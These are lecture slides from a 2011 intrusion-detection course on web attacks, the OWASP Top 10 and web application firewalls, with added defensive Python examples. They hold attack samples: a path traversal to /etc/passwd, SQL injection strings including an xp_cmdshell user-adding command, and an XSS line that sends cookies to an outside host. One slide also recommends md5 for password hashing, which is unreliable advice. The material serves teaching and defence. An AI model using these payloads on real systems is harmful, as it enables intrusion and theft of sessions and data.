Chapter 7. Web Application Firewall
IMS784 (Intrusion Detection Systems)
Spring, 2011
Prof. H. K. Kim
1
Agenda
• I. Remind for term project
• II. Web security threats
• III. Web application Firewall
• IV. Practical recommendations
2
Remind – term project
Selected dataset: 1999 DARPA Intrusion Detection data set
http://www.ll.mit.edu/mission/communications/ist/corpora/id/data/1999data.html
http://www.ll.mit.edu/mission/communications/ist/corpora/ideval/index.html
Notes)
Writing in Korean is allowed without any penalty.
Make a group of 2~3 students.
Your term paper must include the following items.
(1) Analyze the 1999 DARPA data set first and explain the dataset. If you have any criticism regarding the dataset itself or the experiment design, then describe it.
- You will get no points if you just write a few sentences or a small paragraph of criticism.
3
Notice – term project
(2) Select the papers (more than 3 papers) related to these experiments.
- The newer the paper, the better.
- Describe why you selected these papers (a lot of citations, interesting for what).
(3) Give your criticism about those papers.
- You will get no points if you just write a few sentences (too short!) or a small paragraph of criticism.
(4) You have to develop your own algorithm/methodology to improve on the previous research.
- Describe your experiment design.
- Submit your code if you develop an application for your experiment.
- Describe your research's contributions strictly and justify your contributions.
(5) Adopting attack graphs, data mining techniques, statistics tools... any idea will be welcomed.
You have to submit a peer assessment result by contribution for your term paper.
(When your group's members are students A, B and C: A: 55 points, B: 25 points, C: 20 points)
Due date: 16th June
4
Agenda
• I. Notice for term project
• II. Web security threats
• III. Web application Firewall
• IV. Practical recommendations
5
Web application (1/2)
▣ Definition
• A web application is a software application that is accessible using a web browser or HTTP(S) user agent.
6
Web application (2/2)
▣ Web application's architecture: n-tiers (figure)
– Web client: sends an HTTP request (cleartext or SSL) over the transport layer and receives an HTTP reply (HTML, JavaScript, VBScript, etc.)
– Web server: Apache, IIS, Netscape, etc.
– Web apps: Perl, C/C++, JSP, etc.
– Connector to the DB: ADO, ODBC, etc.
– Database: SQL
7
Why is web security important
(figure, image source: www.owasp.org: the layers of a web deployment)
– Network layer: firewall
– OS/Platform layer: hardened OS (Windows, Unix)
– Application layer: web server (Apache, IIS…), app server, custom developed application code; HTTP request (cleartext or SSL) in, HTTP reply (HTML, JavaScript, VBScript, etc.) out
– Database layer: firewall, database connection (ADO, JDBC, etc.), databases
Your security "perimeter" has huge holes at the application layer.
We can't protect against or detect application-layer attacks with the traditional safeguards of the network layer and OS layer (firewall, ACL, OS hardening, SSL).
8
Why is web security important
Network and OS layer protection cannot block web attacks.
A lot of vulnerabilities are newly discovered every month in well-known web applications (e.g. Tomcat, Apache, Zeroboard, etc.).
The only thing that a firewall and ACL can do is "blocking or permitting".
It is extremely hard to defend against zero-day attacks.
It is hard to find and fix vulnerabilities in in-house web applications.
With these vulnerabilities, hackers can get inside the network and servers.
The most valuable assets (e.g. customers' personal information) can be exposed by web attacks.
It is hard to apply database encryption methods due to performance degradation.
The importance of web security keeps growing.
9
Why is web security important
"Now is the time for security at Application Level", Dec. 2005, Gartner
10
Is it easy to hack into the web? (an ordinary browser request)
GET / HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie:
NID=19=LWH0mZNAX517tLm1zQBdKc55MBOkXjxTfHcxEdwH9NTJaWLgYfGglP2Ji16h45r76aDJcqrKl
uXxr_X zJETi1Zm45jVw_mQ1RiZp8dFji1SOigJ-HulNC9MBpOSG_RVO;
PREF=ID=3caba30d3a03f500:TM=1232592795:LM=1232592795:S=b3Yz2CoeVFRPz-fm
11
Useful web hacking tools
• Web crack
– For password brute force attacks
• IntelliTemper, WebZIP
– For gathering the directory scheme and files
12
Basic web hacking technique
• Directory traversal and file download
– You got a URL path and the web server's OS is a Linux system
• http://www.victim.com/board/down.jsp?filename=upload.hwp
– Try this for downloading a sensitive file
• http://www.victim.com/board/down.jsp?filename=../../../../../../../../../../../etc/passwd
– Try directory listing
13
OWASP top 10
• OWASP top 10 project
– http://www.owasp.org/index.php/OWASP_Top_Ten_Project
• Open Web Application Security Project
– Promotes secure software development
– Oriented to the delivery of web-oriented services
– Focused primarily on "back-end" rather than web-design issues
– An open forum for discussion
14
OWASP top 10
• OWASP top 10 project
– http://www.owasp.org/index.php/OWASP_Top_Ten_Project
– Korean translation: http://www.securityplus.or.kr/xe/?module=file&act=procFileDownload&file_srl=25999&sid=00866c962d596769cb97cd9fadb81947
• Open Web Application Security Project
– Promotes secure software development
– Oriented to the delivery of web-oriented services
– Focused primarily on "back-end" rather than web-design issues
– An open forum for discussion
15
OWASP top 10
• Top 10 issues (~2009)
– A1. Unvalidated Input
– A2. Broken Access Controls
– A3. Broken Authentication and Session Management
– A4. Cross Site Scripting Flaws
– A5. Buffer Overflows
– A6. Injection Flaws
– A7. Improper Error Handling
– A8. Insecure Storage
– A9. Denial of Service
– A10. Insecure Configuration Management
16
What's new in OWASP Top 10 (2010)
(figure: mapping of the previous list onto the 2010 list, marking items that stayed (=), were added (+) and were removed (-))
Ref: OWASP Top 10 project - 2010 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
17
OWASP Top 10 (2010)
(figure)
18
OWASP Top 10 (2010)
(figure)
19
Injection – SQL injection illustrated
(figure, image source: www.owasp.org: the application attack passes the network-layer firewall and the hardened OS/platform, reaches the application layer (web server, app server, custom code for business functions: accounts, finance, administration, transactions, communication, knowledge mgmt, e-commerce) and continues as a SQL query into the database layer (databases, legacy systems, web services, directories, human resources, billing, DB table))
HTTP request (form data): Account: ' OR 1=1--   SKU:
SQL query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
HTTP response (Account Summary): Acct:5424-6066-2134-4334, Acct:4128-7574-3921-0192, Acct:5424-9383-2039-4029, Acct:4128-0004-1234-0293
1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards the attack to the database in a SQL query
4. Database runs the query containing the attack and sends encrypted results back to the application
5. Application decrypts the data as normal and sends the results to the user
20
More SQL injection examples
Vulnerable login check (classic ASP / VBScript) that builds the query by string concatenation:
Query = "SELECT user_id FROM member WHERE user_id = '" & strUser_id & "' AND password = '" & strPassword & "'"
strAuthCheck = GetQueryResult(Query)
If strAuthCheck = "" Then
    boolAuthenticated = False
Else
    boolAuthenticated = True
End If
Then try to inject these:
Id: ' or ''='
password: ' or ''='
The query the database actually receives:
Query = "SELECT user_id FROM member WHERE user_id = '' or ''='' AND password = '' or ''=''"
strAuthCheck = GetQueryResult(Query)
If strAuthCheck = "" Then
    boolAuthenticated = False
Else
    boolAuthenticated = True
End If
21
More SQL injection examples
More dangerous injection code:
''%'; EXEC master.dbo.xp_cmdshell "net user sqltest sqltest /add"--%'
22
Injection – how to defend
1. Use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface (e.g. stored procedures). Even though these APIs are parameterized, they may still allow injection.
2. If a parameterized API is not available, you should carefully filter special characters using the specific escape syntax of that interpreter.
Example of filtering code for user input validation (Java):
import java.util.regex.Pattern;
// Every character that is not a letter, a digit or '.' is prefixed with a backslash.
static Pattern escaper = Pattern.compile("([^a-zA-Z0-9.])");
String queryinput = request.getParameter("DB_INPUT");
String newqueryinput = escaper.matcher(queryinput).replaceAll("\\\\$1");
23
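Added example (not from the lecture slides): the login check from slide 21 written twice, once with string concatenation as on the slide and once with a parameterized query, run against a constructed in-memory SQLite table so the effect of the `' or ''='` payload on each can be compared.

```python
"""The slide's login check, concatenated vs. parameterized, against SQLite."""
import sqlite3


def make_db():
    # Constructed sample data: a single legitimate account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (user_id TEXT, password TEXT)")
    conn.execute("INSERT INTO member VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn, user_id, password):
    # Same construction as the slide: user input becomes part of the SQL text,
    # so a quote in the input changes the structure of the statement.
    query = ("SELECT user_id FROM member WHERE user_id = '" + user_id +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, user_id, password):
    # The SQL text is fixed; the inputs are bound as values and never parsed
    # as SQL, so quotes inside them have no syntactic effect.
    query = "SELECT user_id FROM member WHERE user_id = ? AND password = ?"
    return conn.execute(query, (user_id, password)).fetchone() is not None


def demo():
    """Run both checks with valid credentials and with the slide's payload."""
    conn = make_db()
    injected = "' or ''='"  # used as both id and password, as on the slide
    return {
        "vuln_valid": login_vulnerable(conn, "alice", "s3cret"),
        "vuln_injected": login_vulnerable(conn, injected, injected),
        "param_valid": login_parameterized(conn, "alice", "s3cret"),
        "param_injected": login_parameterized(conn, injected, injected),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenated version authenticates the payload because the resulting WHERE clause ends in `or ''=''`; the parameterized version only matches a row whose user_id literally equals the payload string.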
XSS – XSS illustrated
(figure, image source: www.owasp.org: attacker, application with stored XSS code (custom code for accounts, finance, administration, transactions, communication, knowledge mgmt, e-commerce), victim)
1. Attacker sets the trap – posts the JavaScript code to the application, where it is stored
2. Victim views the page – sees the attacker's posting; the script runs inside the victim's browser with full access to the DOM and cookies
3. Usually, the script is designed to send the victim's session or cookie to the hacker silently. With the victim's session ID or cookie, the hacker can log in to the web site without the victim's ID and password.
24
More XSS example
• url="http://143.248.3.1/GetCookie.asp?cookie="+document.cookie;window.open(url,width=0, height=0);
25
More XSS example
• With the stolen cookie, how to exploit
• You can use Burp Suite or Paros for editing HTTP request fields. Replace the cookie field with the captured victim's value.
26
XSS – how to defend
1. Filter all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Do not allow users' HTML tag or script input.
2. If a web application requires users' input of special characters, then apply positive or "whitelist" input validation.
Example code for filtering user inputs (figure)
27
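Added example (not from the lecture slides, which show the filtering code only as an image): the two defences on slide 27, context-dependent escaping of untrusted data and positive ("whitelist") validation, applied to a constructed posting that carries the cookie-stealing script from slide 25. The field names and patterns in WHITELIST are assumptions for the demonstration.

```python
"""Contextual output escaping and whitelist input validation for XSS."""
import html
import json
import re
import urllib.parse

# Constructed sample: a stored posting containing the slide's cookie-stealing script.
POSTING = ('<script>url="http://example.invalid/GetCookie.asp?cookie="'
           '+document.cookie;window.open(url)</script>')


def escape_for_context(data, context):
    """Escape untrusted data for the place in the page it will be inserted."""
    if context in ("body", "attribute"):
        # Between tags or inside a quoted attribute: neutralise < > & " '
        return html.escape(data, quote=True)
    if context == "javascript":
        # Inside a JS string literal: emit a JSON literal and hide < and > so the
        # HTML parser can never see a closing </script> inside the string.
        return json.dumps(data).replace("<", "\\u003c").replace(">", "\\u003e")
    if context == "url":
        # Inside a query-string parameter value: percent-encode everything.
        return urllib.parse.quote(data, safe="")
    raise ValueError("unknown context: " + context)


# Positive validation: describe exactly what is allowed, reject everything else.
WHITELIST = {
    "username": re.compile(r"^[A-Za-z0-9_]{3,20}$"),
    "zip_code": re.compile(r"^[0-9]{5}$"),
    "comment": re.compile(r"^[A-Za-z0-9 .,!?'\-]{1,200}$"),
}


def validate(field, value):
    """True only if the field has a whitelist pattern and the value matches it."""
    pattern = WHITELIST.get(field)
    return pattern is not None and pattern.fullmatch(value) is not None


def render_fragments(posting):
    """Build the four page fragments a forum might emit for one posting."""
    return {
        "body": "<p>" + escape_for_context(posting, "body") + "</p>",
        "attribute": '<input value="' + escape_for_context(posting, "attribute") + '">',
        "javascript": "var c = " + escape_for_context(posting, "javascript") + ";",
        "url": "/search?q=" + escape_for_context(posting, "url"),
    }


if __name__ == "__main__":
    for ctx, frag in render_fragments(POSTING).items():
        print(ctx, "=>", frag)
    print(validate("comment", POSTING), validate("comment", "Nice post!"))
```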
1. Unvalidated Parameters
• HTTP requests from browsers to web apps
– URL, query string, form fields, hidden fields, cookies, headers
– Web apps use this information to generate web pages
• Attackers can modify anything in the request
– WebScarab
• Key Points:
– Check before you use anything in an HTTP request
– Canonicalize before you check
– Client-side validation is irrelevant
– Reject anything not specifically allowed
• Type, min/max length, character set, regex, min/max value…
28
2. Broken Access Control
• Access control is how you keep one user away from other users' information
• The problem is that many environments provide authentication, but don't handle access control well
– Many sites have a complex access control policy
– Insidiously difficult to implement correctly
• Key Points
– Write down your access control policy
– Don't use any "id's" that an attacker can manipulate
– Implement access control in a centralized module
29
3. Broken Account and Session Management
• Account Management
– Handling credentials across the client-server gap
– Backend authentication credentials too
• Session Management
– HTTP is a "stateless" protocol. Web apps need to keep track of which request came from which user
– "Brand" sessions with an id using a cookie, hidden field, URL tag, etc…
• Key Points
– Keep credentials secret at all times
– Use only the random session id provided by your environment
30
3. Broken Account and Session Management
• By exploiting a web vulnerability in the MS SQL Reporting Services, an attacker is able to do directory traversal and download sensitive data
31
4. Cross-Site Scripting (XSS) Flaws
• Web browsers execute code sent from websites
– JavaScript
– Flash and many others haven't really been explored
• But what if an attacker could get a website to forward an attack!
– Stored – web application stores content from a user, then sends it to other users
– Reflected – web application doesn't store the attack, just sends it back to whoever sent the request
• Key Points
– Don't try to strip out active content – too many variations. Use a "positive" specification.
32
5. Buffer Overflows
• Web applications read all types of input from users
– Libraries, DLLs, server code, custom code, exec
• C and C++ code is vulnerable to buffer overflows
– Input overflows the end of the buffer and overwrites the stack
– Can be used to execute arbitrary code
• Key Points
– Be careful about reading into buffers
– Use safe string libraries correctly
33
6. Command Injection Flaws
• Web applications involve many interpreters
– OS calls, SQL databases, templating systems
• Malicious code
– Sent in the HTTP request
– Extracted by the web application
– Passed to the interpreter, executed on behalf of the web app
• Key Points
– Use extreme care when invoking an interpreter
– Use limited interfaces where possible (PreparedStatement)
– Check return values
34
7. Error Handling Problems
• Errors occur in web applications all the time
– Out of memory, too many users, timeout, db failure
– Authentication failure, access control failure, bad input
• How do you respond?
– Need to tell the user what happened (no hacking clues)
– Need to log an appropriate (different) message
• Key Points:
– Make sure error screens don't print stack traces
– Design your error handling scheme
– Configure your server
35
7. Error Handling Problems
(figure)
36
8. Insecure Use of Cryptography
• Use cryptography to store sensitive information
– Algorithms are simple to use, integrating them is hard
• Key Points
– Do not even think about inventing a new algorithm
– Be extremely careful storing keys, certs, and passwords
– Rethink whether you need to store the information
– Don't store user passwords – use a hash like SHA-256 or md5
• The "master secret" can be split into two locations and assembled
– Configuration files, external servers, within the code
37
9. Remote Administration Flaws
• Many sites allow remote administration
– Very powerful, often hidden interfaces
– Difficult to protect
• Key Points
– Eliminate all administration over the Internet
– Separate the admin application from the main app
– Limit the scope of remote administration
• Consider strong authentication
– Smart card or token
39
10. Web and Application Server Misconfiguration
• All web and application servers have many security-relevant configuration options
– Default accounts and passwords
– Unnecessary default, backup, sample apps, libraries
– Overly informative error messages
– Misconfigured SSL, default certificates, self-signed certs
– Unused administrative services
• Key Points:
– Keep up with patches (Code Red, Slammer)
– Use scanning tools (Nikto, Nessus)
– Harden your servers!
40
Agenda
• I. Notice for term project
• II. Web security threats
• III. Web application Firewall
• IV. Practical recommendations
41
Web Application Firewall
• Why do we need a WAF? We already have an IPS.
– An IPS covers all of the network protocol and application flaws.
– A WAF is specifically designed for detecting and preventing HTTP attacks.
– If you use both, the WAF will save the IPS's workload for detecting HTTP-side attacks.
• A WAF has unique functionality based on whitelists and blacklists.
– It enumerates all HTTP requests, including their parameters, on the sites it protects and maintains that list.
– It blocks well-known attacks against HTTP servers (Apache, IIS, etc.) and attack patterns in the OWASP top 10 categories.
42
Web Application Firewall
• A WAF is a valuable security solution because Web applications are too sophisticated for an IDS/Intrusion Prevention System (IPS) to protect.
• Each Web application is unique, which makes it too complex for a static pattern-matching solution.
• A WAF has the capability to understand what characters are allowed within the context of the many pieces and parts of a Web page.
43
WAF Protection models
• WAF's modeled approaches to filtering traffic
– user permission-based access control
– centralized authentication
– negative security
– positive security
– virtual patching
– output filtering
44
WAF – positive filtering model
• Allows only "known good" traffic to pass
– Some allow, all deny
– A WAF running a positive security approach is like a paranoid security guard who automatically assumes that everyone he doesn't recognize is malicious.
– With this model, the WAF catches unknown (or zero-day) attacks
– It does not need to have its signature file updated regularly.
– It requires extensive training or learning time, which takes much up-front time and energy
45
WAF – negative filtering model
• Block known bad items
– Some deny, all allow
– Monitor and detect known problems
– Easy to develop, false positives are uncommon
– The negative security model does not detect unknown threats
46
WAF – virtual patching model
• Network level defense
• Even though there are security holes in the back-end servers, the WAF can defend them from the related attacks.
– This concept allows an IDS/IPS administrator to install a custom filter to protect an unpatched system
– Virtual patching requires an administrator to have the exploit code to properly test the solution, or the patch has to be generic
• E.g. block all packets which contain the following string
– DECLARE%20@S%20NVARCHAR(4000)
– It is part of one particular SQL injection attack payload
– All the various attacks containing this string will be blocked
47
WAF – Output Detection Model/Content Scrubbing
• A WAF is still weak against evasion techniques
– SQL injection attacks typically involve an apostrophe, which can be encoded in the attack request several different ways, so the WAF possibly misses some attacks:
– ', %27, Char(39), ', ', \', '
• But dealing with return messages is relatively easy.
e.g. DataLayerAPI error '80040e14' Unclosed quotation mark after the character string ''
• When output detection is configured to detect some specific error messages, it prevents the error message from returning to the attacker.
– It can rewrite the response to make it look like the error never happened
– It can redirect return pages to a pre-defined page
48
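Added example (not from the lecture slides) covering slides 46 and 48 together: a minimal negative-model request filter that first canonicalises the apostrophe encodings the slide lists (percent-encoding, Char(39), backslash-escaped, and HTML entities such as `&#39;`, assumed here as one of the forms the slide rendered as a plain quote) before matching its signature, followed by the output-detection step that scrubs the `80040e14` database error out of a response. The signature and the replacement page are constructed for the demonstration.

```python
"""Negative-model request filtering with canonicalisation, plus output scrubbing."""
import html
import re
import urllib.parse

# Known-bad pattern (negative model): a quote followed by OR/AND, or a SQL comment.
SQLI_SIGNATURE = re.compile(r"'\s*(or|and)\b.*=|--", re.IGNORECASE)


def normalise(value):
    """Reduce a request value to one canonical form before inspection.

    Repeats until nothing changes so that double encoding (%2527) is unwrapped too.
    """
    prev = None
    while prev != value:
        prev = value
        value = urllib.parse.unquote(value)                              # %27 -> '
        value = html.unescape(value)                                     # &#39; -> '
        value = re.sub(r"char\(\s*39\s*\)", "'", value, flags=re.IGNORECASE)
        value = value.replace("\\'", "'")                                # \' -> '
    return value


def inspect_request(params):
    """Return (parameter, decoded value) of the first signature hit, else None."""
    for name, raw in params.items():
        decoded = normalise(raw)
        if SQLI_SIGNATURE.search(decoded):
            return name, decoded
    return None


# Output detection: database error strings that must never reach the client.
DB_ERROR = re.compile(r"error '80040e14'|Unclosed quotation mark", re.IGNORECASE)
NEUTRAL_PAGE = "<html><body>Request could not be processed.</body></html>"


def scrub_response(body):
    """Return (body to send, scrubbed?): a leaking error page is replaced whole."""
    if DB_ERROR.search(body):
        return NEUTRAL_PAGE, True
    return body, False


if __name__ == "__main__":
    # Constructed samples: the same payload in three of the encodings from the slide.
    for q in ["%27 or %27%27=%27", "&#39; or &#39;&#39;=&#39;", "char(39) or 1=1--"]:
        print(q, "->", inspect_request({"id": q}))
    leak = "DataLayerAPI error '80040e14' Unclosed quotation mark after the character string ''"
    print(scrub_response(leak))
```

Without the normalise step the first two samples would pass the signature untouched, which is exactly the evasion the slide describes; the scrubbing step is the cheaper complement because the error text leaves the server in one fixed form.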
WAF policy models
• Learning
– For gathering a reliable source for obtaining a rule set
• By placing the WAF in a secure environment and letting the software monitor create a database of what constitutes acceptable behavior.
• The WAF can learn by watching trusted activity from a trusted source.
• Vulnerability assessment feedback
– Learning alone is not good enough
– Gather information for the WAF configuration by vulnerability assessment (VA) with an automated tool, professional service, or manual assessment.
• Manual entry
– Enumerate and subscribe all of the allowable subdirectories, subdomains, file types, or any number of other files, folders, or situations
49
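Added example (not from the lecture slides) covering the positive filtering model of slide 45 and the learning policy model of slide 49: a small whitelist model that derives a per-URL parameter profile (parameter names, character class, maximum length) from constructed trusted requests, then enforces it so that the directory-traversal and SQL-injection inputs from earlier slides fall outside the learned profile. URLs, parameter names and character classes are assumptions for the demonstration.

```python
"""Positive security model learned from trusted traffic, then enforced."""
import re
from collections import defaultdict

# Character classes a learned profile may settle on, narrowest first.
CHARSETS = [("digits", re.compile(r"^[0-9]+$")),
            ("alnum", re.compile(r"^[A-Za-z0-9_]+$")),
            ("text", re.compile(r"^[A-Za-z0-9_ .,!?@\-]+$"))]
RANK = {name: i for i, (name, _) in enumerate(CHARSETS)}
RANK["any"] = len(CHARSETS)   # anything wider than the widest learned class


def classify(value):
    """Return the narrowest character class that covers the whole value."""
    for name, pattern in CHARSETS:
        if pattern.match(value):
            return name
    return "any"


class PositiveModel:
    def __init__(self):
        # profile[url][param] = {"charset": widest class seen, "max_len": longest seen}
        self.profile = defaultdict(dict)

    def learn(self, url, params):
        """Training mode: widen the profile just enough to cover one trusted request."""
        for name, value in params.items():
            entry = self.profile[url].setdefault(name, {"charset": "digits", "max_len": 0})
            seen = classify(value)
            if RANK[seen] > RANK[entry["charset"]]:
                entry["charset"] = seen
            entry["max_len"] = max(entry["max_len"], len(value))

    def check(self, url, params):
        """Enforcement mode: None if the request fits the profile, else the reason."""
        if url not in self.profile:
            return "unknown URL"
        allowed = self.profile[url]
        for name, value in params.items():
            if name not in allowed:
                return "unknown parameter " + name
            entry = allowed[name]
            if RANK[classify(value)] > RANK[entry["charset"]]:
                return "character set violation in " + name
            if len(value) > entry["max_len"]:
                return "value too long for " + name
        return None


def build_trained_model():
    """Constructed trusted traffic for a download page and a login form."""
    model = PositiveModel()
    for params in [{"filename": "upload.hwp"}, {"filename": "report_2011.pdf"}]:
        model.learn("/board/down.jsp", params)
    for params in [{"id": "alice", "pw": "s3cret"}, {"id": "bob_99", "pw": "passw0rd"}]:
        model.learn("/login.jsp", params)
    return model


if __name__ == "__main__":
    m = build_trained_model()
    print(m.check("/board/down.jsp", {"filename": "../../etc/passwd"}))
    print(m.check("/login.jsp", {"id": "' or ''='", "pw": "x"}))
    print(m.check("/login.jsp", {"id": "carol", "pw": "hunter2"}))
```

The model needs no signature for either attack, which is the zero-day argument of slide 45; the price is that a legitimate value outside the training set (a longer password, a new parameter after a site update) is blocked just the same, which is the training cost and the maintenance problem the slides mention.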
VA+WAF
• Some commercial WAF products have an integration module or interface with a VA tool
• More efficient than manual entry
50
Limitation
• A WAF is focused on web-based attacks
• Use both a WAF and an IDPS
• A WAF still has false-positive and false-negative problems
• Performance degradation – a deadly bottleneck
• Lots of maintenance cost
– Misconfiguration issues
– Hard to handle frequent web site updates and renewals
• A WAF itself does not fix the source code.
– Secure coding is highly required
51
Commercial WAF
• art of defence - hyperguard
• Trustwave - WebDefend Web Application Firewall
• Deny All - rWeb
• Fortify Software - Defender
• Imperva - SecureSphere
• Applicure - DotDefender
• Radware AppWall
• Armorlogic - Profense
• Barracuda Networks - Application Firewall
• Bee-Ware - iSentry
• BinarySec - Application Firewall
• BugSec - WebSniper
• Cisco - ACE Web Application Firewall
• Citrix - Application Firewall
• eEye Digital Security - SecureIIS
• F5 - Application Security Manager
• Forum Systems - Xwall, Sentry
• mWEbscurity - webApp.secure
• Phion / Visonys - Airlock
• Privacyware - ThreatSentry IIS Web Application Firewall
• Protegrity - Defiance TMS - Web Application Firewall
• Xtradyne - Application Firewalls
52
Open source based WAF
• ModSecurity
– http://www.modsecurity.org
• Guardian
– http://guardian.jumperz.net/index.html
• WebKnight
– http://www.aqtronix.com/?PageID=99
53
Agenda
• I. Notice for term project
• II. Web security threats
• III. Web application Firewall
• IV. Practical recommendations
54
Web Application Firewall (recommendations and the obstacles to each)
• Deploy an IPS and a web application firewall in front of web servers
– Obstacles: performance degradation; limits in budget; false-positives
• Review all source code of web applications before the code goes into service
– Obstacles: frequent updates and renewals of web sites; lack of security experts
• Patch all known security flaws
– Obstacle: every month there are more new vulnerabilities discovered
• Establish standards
– Obstacles: no standards; legacy systems developed with various languages
55
More practical recommendations
• Separate the database that handles continuous user input (e.g. web BBS) from other databases.
• Implement a 3-tier architecture or middleware for sanitizing transactions.
• Developing a DLL or a dummy TCP server will be enough.
• Use replicated databases – even if a hacker's attack succeeds, the original data will always be safe and secure.
(figure)
– Web server: do not allow a direct DB connection; use a user-defined service port for the middleware service
– Middle component server: parses the query request and sends the query only if the pre-defined condition is matched (source IP = web server, who = sa2, query = SELECT only)
– Replicated database: DB connections are only allowed from the middleware component server
– Original database
56
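Added example (not from the lecture slides): the middleware gate from the figure above, which forwards a query to the database only when all three pre-defined conditions hold (source IP = web server, who = sa2, query = SELECT only). The web server address, the comment-stripping rule and the list of write/execute keywords are assumptions for the demonstration.

```python
"""Middleware gate: forward a query only from the web server, as sa2, and only a single SELECT."""
import re

ALLOWED_SOURCES = {"10.0.1.10"}        # constructed address of the web server
ALLOWED_USER = "sa2"
FIRST_WORD = re.compile(r"^\s*([A-Za-z]+)")
WRITE_OR_EXEC = re.compile(r"\b(INTO|EXEC|EXECUTE|xp_cmdshell)\b", re.IGNORECASE)


def strip_comments(sql):
    """Remove SQL comments so a second statement cannot hide inside one."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.DOTALL)
    return re.sub(r"--[^\n]*", " ", sql)


def is_select_only(sql):
    """True only for one statement that starts with SELECT and contains no other."""
    sql = strip_comments(sql).strip().rstrip(";").strip()
    if ";" in sql:                    # stacked statements: SELECT ...; EXEC ...
        return False
    m = FIRST_WORD.match(sql)
    if not m or m.group(1).upper() != "SELECT":
        return False
    # A statement that begins with SELECT can still write (SELECT ... INTO) or execute.
    return WRITE_OR_EXEC.search(sql) is None


def gate(source_ip, user, sql):
    """Return (forward?, reason) for one query, mirroring the slide's three conditions."""
    if source_ip not in ALLOWED_SOURCES:
        return False, "source is not the web server"
    if user != ALLOWED_USER:
        return False, "DB user is not " + ALLOWED_USER
    if not is_select_only(sql):
        return False, "not a single SELECT"
    return True, "forwarded to the original database"


if __name__ == "__main__":
    # Constructed requests: a normal read, the two injection payloads from the
    # SQL injection slides, a wrong DB user and a wrong source address.
    requests = [
        ("10.0.1.10", "sa2", "SELECT title FROM board WHERE id = 42"),
        ("10.0.1.10", "sa2", "SELECT * FROM accounts WHERE acct='' OR 1=1--'"),
        ("10.0.1.10", "sa2", "SELECT 1; EXEC master.dbo.xp_cmdshell 'net user sqltest sqltest /add'--"),
        ("10.0.1.10", "sa", "SELECT title FROM board"),
        ("10.0.2.5", "sa2", "SELECT title FROM board"),
    ]
    for src, who, q in requests:
        print(src, who, q[:40], "->", gate(src, who, q))
```

Note that the `OR 1=1--` query still passes: the gate limits what a compromised web server can do to the database (read-only, one statement, one user) rather than detecting injection inside a SELECT, which is why the slide pairs it with the separate, replicated database.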
More practical recommendations – no perfection
• Use secondary authentication for protecting users
• A WAF is not enough; IPS+WAF is not enough either.
57
More practical recommendations
• Make a contingency plan.
– Web applications can be compromised at any time.
– Even if we fail to protect against and detect attacks, we must not fail to react. (e.g. Solaris' zone copy for restoring)
– Even if the web application is compromised, the damage should not be propagated to the other processes or servers.
• Use virtualization technology for minimizing damages (e.g. Solaris OS' Zones, VMware, MS Virtual Server).
(figure: application virtualization isolates individual processes; OS virtualization isolates VM1 and VM2 on the real machine; a successful hack damages only the isolated area)
58
Homework
• Web Application Firewall Evaluation Criteria
• https://files.pbworks.com/download/ZQDhMrjby0/webappsec/13247061/wasc-wafec-v1.0.pdf
• 1) Make a group of 2~3 students.
• 2) Read the above WAFEC thoroughly and evaluate any free version of a WAF with the Evaluation Criteria.
• 3) Submit your report to EKU.
59
References
• http://www.owasp.org/index.php/File:OWASP_Top_Ten.ppt
• http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Criteria
• http://www.modsecurity.org/documentation/ApacheCon_Europe_2008-Web_Intrusion_Detection_with_ModSecurity.pdf
• http://en.wikipedia.org/wiki/Application_firewall
• http://guardian.jumperz.net/index.html
• http://webappsec.org/
• http://www.owasp.org/index.php/Web_Application_Firewall
60